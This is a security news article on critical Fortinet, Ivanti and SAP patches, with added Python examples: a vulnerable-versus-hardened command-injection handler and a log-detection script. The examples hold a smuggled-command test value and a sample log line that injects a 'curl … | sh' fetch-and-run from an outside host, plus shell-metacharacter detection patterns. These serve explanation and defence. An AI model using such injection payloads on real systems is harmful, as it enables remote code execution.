Ivanti, Fortinet, and SAP Release Patches for Multiple Critical Vulnerabilities

Major enterprise software vendors Fortinet, Ivanti, and SAP have released urgent security updates addressing multiple critical vulnerabilities that could enable remote code execution, privilege escalation, and sensitive data exposure across widely used enterprise systems.

The flaws, some carrying near-maximum severity ratings, affect cloud services, network security appliances, and enterprise resource planning platforms used globally.

Fortinet fixes critical command injection flaw

Security vendor Fortinet has patched a critical vulnerability in its FortiSandbox product line, tracked as CVE-2026-25089 with a CVSS score of 9.1.

The flaw is an OS command injection caused by improper neutralization of user-supplied input in the appliance's web interface: an unauthenticated attacker who can reach that interface can execute system commands by sending specially crafted HTTP requests.
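As an added illustration of the vulnerability class described above (example code written for this article, not Fortinet's code; the FortiSandbox implementation is not public), the snippet below shows a web-interface handler that shells out to a diagnostic tool with a caller-supplied target, first in the vulnerable string-concatenation pattern and then hardened with allow-list validation and an argv list. The `echo` stand-in for the real diagnostic tool, the function names and the hostname rule are assumptions made for the example.

```python
import ipaddress
import re
import subprocess

# Stand-in for the appliance's real diagnostic tool. Assumption for this example:
# the vulnerable handler runs something like "ping -c 1 <target>" with a target
# taken from the HTTP request. "echo" lets the example run offline.
TOOL = ["echo", "ping", "-c", "1"]

# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
_HOST_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_HOST_LABEL}(?:\.{_HOST_LABEL})*\.?$")


def run_diagnostic_unsafe(target: str) -> str:
    """Vulnerable pattern: untrusted input is concatenated into a shell command line.

    With shell=True the shell parses the whole string, so ';', '|', '&&', '$(...)'
    and backticks in `target` become additional commands."""
    cmd = " ".join(TOOL) + " " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_target(target: str) -> str:
    """Allow-list validation: accept an IP literal or a syntactically valid
    hostname and reject everything else. Rejecting a leading '-' also stops the
    value from being parsed as an option by the tool."""
    if not target or len(target) > 253:
        raise ValueError("target missing or too long")
    try:
        ipaddress.ip_address(target)  # raises ValueError if not an IP literal
        return target
    except ValueError:
        pass
    if not _HOSTNAME_RE.match(target):
        raise ValueError(f"invalid target: {target!r}")
    return target


def run_diagnostic_safe(target: str) -> str:
    """Hardened pattern: validate first, then pass an argv list with shell=False,
    so the target reaches the tool as a single argument and no shell ever sees it."""
    host = validate_target(target)
    return subprocess.run(TOOL + [host], shell=False, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("unsafe:", repr(run_diagnostic_unsafe(payload)))   # second command runs
    try:
        run_diagnostic_safe(payload)
    except ValueError as exc:
        print("safe:", exc)                                   # rejected before execution
```

Validation alone is not the fix; the argv list with `shell=False` is what removes the shell from the data path, and the allow-list then limits what the tool itself can be made to do with the argument.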

The vulnerability affects multiple versions of:

  • FortiSandbox (5.0.0–5.0.5)
  • FortiSandbox Cloud (5.0.4–5.0.5)
  • FortiSandbox PaaS (5.0.4–5.0.5)

Fortinet has urged customers to upgrade to patched versions to prevent potential remote exploitation.

Ivanti patches two critical flaws in Ivanti Sentry

Enterprise security provider Ivanti has released fixes for two severe vulnerabilities in Ivanti Sentry (formerly MobileIron Sentry), both of which could allow full system compromise.

The vulnerabilities include:

  • CVE-2026-10520 – A command injection flaw that could give an unauthenticated attacker remote code execution as root
  • CVE-2026-10523 – An authentication bypass that lets an attacker create administrative accounts without supplying any credentials

Security researchers reported that the command injection can be triggered by a specially crafted HTTP request to a vulnerable API endpoint, whose input is then passed on to backend system components.

Ivanti confirmed that its patch not only removes access to the vulnerable endpoint but also strengthens authentication controls to prevent unauthorized access attempts.

SAP addresses multiple enterprise system vulnerabilities

Enterprise software giant SAP has released security updates for four vulnerabilities, two of them critical, affecting SAP NetWeaver and related platforms.

The vulnerabilities include:

  • XML signature wrapping flaw in SAML authentication (CVSS 9.9); in the general XSW pattern an attacker keeps a validly signed assertion in the document but adds an unsigned one that the application actually consumes, so the signature check passes while the asserted identity is attacker-controlled
  • Memory corruption issue in SAP Application Server ABAP (CVSS 9.8)
  • Security weakness in SAP Commerce Cloud and Data Hub components
  • Directory traversal vulnerability in SAP NetWeaver Java Web Container

Security researchers warn that these flaws could allow attackers to manipulate authentication processes, access sensitive data, or disrupt enterprise applications if exploited.

No active exploitation reported, but risk remains high

Although there is currently no confirmed evidence of active exploitation in the wild, cybersecurity experts stress that organizations should patch immediately due to the severity of the vulnerabilities and the widespread use of affected systems.

Security analysts warn that products from vendors such as Fortinet, Ivanti, and SAP are frequent targets for threat actors because they are often reachable from the internet and sit at the boundary of, or deep inside, corporate networks and critical business environments.

Urgent call for patching and risk mitigation

Experts recommend that organizations:

  • Apply vendor patches without delay
  • Restrict administrative and management interfaces to trusted management networks or VPNs rather than exposing them to the internet
  • Monitor for unusual authentication events, such as administrative accounts appearing without a corresponding authenticated session, and for command execution attempts against web and API endpoints
  • Review logs for signs of reconnaissance activity such as path enumeration and scanner traffic
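The monitoring and log-review advice above, and the Ivanti authentication bypass that creates administrative accounts without credentials, can be turned into concrete detections. The script below is an added example written for this article, not a vendor-supplied rule set: it runs three heuristics over a constructed sample of appliance web-interface access logs in JSON-lines form. The field names, the `/api/v1/admin/` and `/api/v1/diag` paths, the threshold and the addresses are all assumptions made for the example, not any vendor's real log schema or endpoints.

```python
import json
from collections import Counter
from urllib.parse import unquote

# Constructed sample log (JSON lines). Field names and paths are assumptions for
# this example. 203.0.113.7 probes for files, creates an admin account without
# being logged in, then sends an encoded shell payload to a diagnostic endpoint.
SAMPLE_LOG = """\
{"ts":"2026-03-10T09:00:01Z","src":"10.1.1.5","user":"admin","method":"GET","path":"/api/v1/status","status":200}
{"ts":"2026-03-10T09:00:05Z","src":"10.1.1.5","user":"admin","method":"POST","path":"/api/v1/admin/users","status":201}
{"ts":"2026-03-10T09:01:00Z","src":"203.0.113.7","user":"","method":"GET","path":"/.env","status":404}
{"ts":"2026-03-10T09:01:01Z","src":"203.0.113.7","user":"","method":"GET","path":"/admin.php","status":404}
{"ts":"2026-03-10T09:01:02Z","src":"203.0.113.7","user":"","method":"GET","path":"/api/v1/","status":404}
{"ts":"2026-03-10T09:01:03Z","src":"203.0.113.7","user":"","method":"GET","path":"/login.jsp","status":404}
{"ts":"2026-03-10T09:01:04Z","src":"203.0.113.7","user":"","method":"GET","path":"/console/","status":404}
{"ts":"2026-03-10T09:02:10Z","src":"203.0.113.7","user":"","method":"POST","path":"/api/v1/admin/users","status":201}
{"ts":"2026-03-10T09:02:11Z","src":"203.0.113.7","user":"","method":"GET","path":"/api/v1/diag?host=127.0.0.1%3Bcurl%20198.51.100.9%2Fx%7Csh","status":200}
{"ts":"2026-03-10T09:03:00Z","src":"10.1.1.9","user":"ops","method":"GET","path":"/api/v1/diag?host=example.com","status":200}
"""

# Characters a shell would interpret; their presence in a request parameter that
# ends up in a system command is the footprint of a command injection attempt.
SHELL_METACHARS = (";", "|", "&&", "`", "$(", "\n", ">")
ADMIN_WRITE_PREFIX = "/api/v1/admin/"   # assumed prefix for privileged write endpoints
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
RECON_404_THRESHOLD = 5                 # assumed threshold; tune per environment


def parse_log(text: str) -> list:
    """Parse JSON-lines log text into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list) -> list:
    """Run three detections over the events and return the findings."""
    findings = []
    not_found_by_src = Counter()
    for ev in events:
        # Attackers URL-encode metacharacters; always inspect the decoded form.
        decoded = unquote(ev["path"])
        if any(m in decoded for m in SHELL_METACHARS):
            findings.append({"rule": "shell_metachars_in_request",
                             "src": ev["src"], "detail": decoded})
        # A successful write to an admin endpoint with no authenticated principal
        # is what an authentication bypass looks like in the access log.
        if (ev["method"] in WRITE_METHODS and ev["path"].startswith(ADMIN_WRITE_PREFIX)
                and not ev.get("user") and 200 <= ev["status"] < 300):
            findings.append({"rule": "unauthenticated_admin_write",
                             "src": ev["src"], "detail": f'{ev["method"]} {ev["path"]}'})
        if ev["status"] == 404:
            not_found_by_src[ev["src"]] += 1
    # A burst of 404s from one source is typical of path enumeration ahead of an exploit attempt.
    for src, n in not_found_by_src.items():
        if n >= RECON_404_THRESHOLD:
            findings.append({"rule": "path_enumeration", "src": src,
                             "detail": f"{n} requests returned 404"})
    return findings


def findings_for_sample() -> list:
    """Convenience entry point: run the detections over the constructed sample."""
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for f in findings_for_sample():
        print(f'{f["rule"]:30} {f["src"]:15} {f["detail"]}')
```

These are heuristics, not signatures: legitimate parameters on some endpoints contain `|` or `;`, the 404 threshold depends on how noisy the interface normally is, and the unauthenticated-write rule only works if the log records the authenticated principal for every request. They are useful precisely because they do not depend on knowing the exact vulnerable endpoint, which is rarely public at the time a patch is released.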

With attackers increasingly automating exploitation of newly disclosed vulnerabilities, security professionals caution that even short delays in patching can significantly increase exposure risk.
